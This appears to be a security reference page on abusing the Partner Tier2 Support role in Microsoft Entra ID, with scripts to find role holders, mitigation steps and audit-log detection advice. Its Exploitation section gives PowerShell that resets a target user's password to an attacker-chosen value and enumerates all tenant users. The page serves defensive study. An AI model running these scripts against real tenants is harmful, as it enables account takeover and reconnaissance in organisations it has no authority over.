AZ_PARTNER_TIER2_SUPPORT

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

Partner Tier2 Support

Affected Object Types

Users, Service Principals, Tenant

Exploitation Certainty

Certain

Graph Permission / Role

Directory Role: Partner Tier2 Support

Description

AZ_PARTNER_TIER2_SUPPORT represents the Partner Tier2 Support directory role in Microsoft Entra ID (Azure AD). This role is assigned to Microsoft Partner organizations through the Cloud Solution Provider (CSP) or delegated administration programs. It grants elevated access to customer tenants for support and management purposes.

Capabilities of Partner Tier2 Support:

Reset passwords for non-admin users and some admin roles
Manage user accounts including creation, modification, and deletion
Access service health information
Create and manage support tickets
Read directory information
Manage groups and group memberships (with some restrictions)
Limited administrative actions on behalf of the customer tenant

Security Implications:

External access: The role is held by principals from an external partner tenant.
Cross-tenant trust: Actions are performed by entities outside your organizational control.
Password reset abuse: Can be used to take over non-admin accounts.
Persistence: Partners may retain access even after business relationships end.
Visibility gaps: Partner actions may not be as visible in customer audit logs.

Important: This role is part of the Delegated Admin Privileges (DAP) or Granular Delegated Admin Privileges (GDAP) model and should be carefully monitored.

Identification

PowerShell

Find Partner Tier2 Support Role Assignments

Find-PartnerTier2SupportRoleAssignments.ps1

Connect-AzAccount

# Get the Partner Tier2 Support role
$rolesUri = "https://graph.microsoft.com/v1.0/directoryRoles"
$rolesResponse = Invoke-AzRestMethod -Uri $rolesUri -Method GET
$roles = ($rolesResponse.Content | ConvertFrom-Json).value

$partnerTier2Role = $roles | Where-Object { $_.displayName -eq "Partner Tier2 Support" }

if (-not $partnerTier2Role) {
    Write-Host "Partner Tier2 Support role is not activated in this tenant."
    exit
}

Write-Host "Found Partner Tier2 Support role: $($partnerTier2Role.id)"

# Get members of the role
$membersUri = "https://graph.microsoft.com/v1.0/directoryRoles/$($partnerTier2Role.id)/members"
$membersResponse = Invoke-AzRestMethod -Uri $membersUri -Method GET
$members = ($membersResponse.Content | ConvertFrom-Json).value

$results = @()
foreach ($member in $members) {
    $memberType = if ($member.'@odata.type') { ($member.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
    $results += [PSCustomObject]@{
        RoleName         = "Partner Tier2 Support"
        RoleId           = $partnerTier2Role.id
        MemberName       = $member.displayName
        MemberId         = $member.id
        MemberType       = $memberType
        UserPrincipalName = $member.userPrincipalName
    }
}

Write-Host "`nFound $($results.Count) members with Partner Tier2 Support role"
$results | Export-Csv -Path ".\PartnerTier2Support_Members.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Check for All Partner Roles

Check-AllPartnerRoles.ps1

# Find all partner-related roles in the tenant
$partnerRoles = $roles | Where-Object { $_.displayName -match "Partner" }

$allPartnerMembers = @()

foreach ($role in $partnerRoles) {
    $membersUri = "https://graph.microsoft.com/v1.0/directoryRoles/$($role.id)/members"
    $membersResponse = Invoke-AzRestMethod -Uri $membersUri -Method GET
    $members = ($membersResponse.Content | ConvertFrom-Json).value
    
    foreach ($member in $members) {
        $memberType = if ($member.'@odata.type') { ($member.'@odata.type' -replace '^#microsoft\.graph\.', '') } else { 'Unknown' }
        $allPartnerMembers += [PSCustomObject]@{
            RoleName         = $role.displayName
            RoleId           = $role.id
            MemberName       = $member.displayName
            MemberId         = $member.id
            MemberType       = $memberType
            UserPrincipalName = $member.userPrincipalName
        }
    }
}

Write-Host "Partner role assignments:"
$allPartnerMembers | Format-Table -AutoSize

Exploitation

A compromised partner account with Tier2 Support access can abuse the delegated privileges to compromise customer tenants.

Reset User Password

Reset-UserPassword-As-Partner.ps1

# As a Partner Tier2 Support user, reset a target user's password
$targetUserId = "<target-user-id>"

$uri = "https://graph.microsoft.com/v1.0/users/$targetUserId"
$body = @{
    passwordProfile = @{
        forceChangePasswordNextSignIn = $false
        password = "Attacker-Controlled-P@ssw0rd!"
    }
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method PATCH -Payload $body

if ($response.StatusCode -eq 204) {
    Write-Output "Successfully reset password for user: $targetUserId"
} else {
    Write-Output "Failed: $($response.Content)"
}

Enumerate Tenant Users

Enumerate-TenantUsers-As-Partner.ps1

# Enumerate all users in the customer tenant
$uri = "https://graph.microsoft.com/v1.0/users?`$select=id,displayName,userPrincipalName,jobTitle,department"
$allUsers = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allUsers += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Output "Enumerated $($allUsers.Count) users in customer tenant"
$allUsers | Format-Table displayName, userPrincipalName, jobTitle, department

Mitigation

Transition from DAP to GDAP: Migrate from Delegated Admin Privileges to Granular Delegated Admin Privileges for more restrictive access.
- Go to Microsoft 365 Admin Center -> Settings -> Partner relationships.
- Review and update partner access permissions.
Review partner relationships regularly:
- Audit which partners have access to your tenant.
- Remove partner relationships that are no longer needed.
Implement least privilege for partners:
- Use GDAP to grant only necessary roles.
- Avoid granting Partner Tier2 Support when Helpdesk-level access is sufficient.
Monitor partner actions:
- Review audit logs for actions performed by partner accounts.
- Alert on password resets and user modifications by external principals.
Require MFA for partner access: Ensure partners accessing your tenant use multi-factor authentication.

Detection

Detect partner access and actions in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by:
- Initiated by (actor): Look for external partner principals.
- Activity: Password reset, User creation, Group modification.

Monitor for:

Password resets by Partner Tier2 Support accounts.
User account modifications by external principals.
New partner role assignments.
Access from partner tenants during unusual hours.

References

PreviousAZ_PARENT_AU NextAZ_PRIVILEGED_AUTH_ADMIN

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagExploitation

hashtagReset User Password

hashtagEnumerate Tenant Users

hashtagMitigation

hashtagDetection

hashtagReferences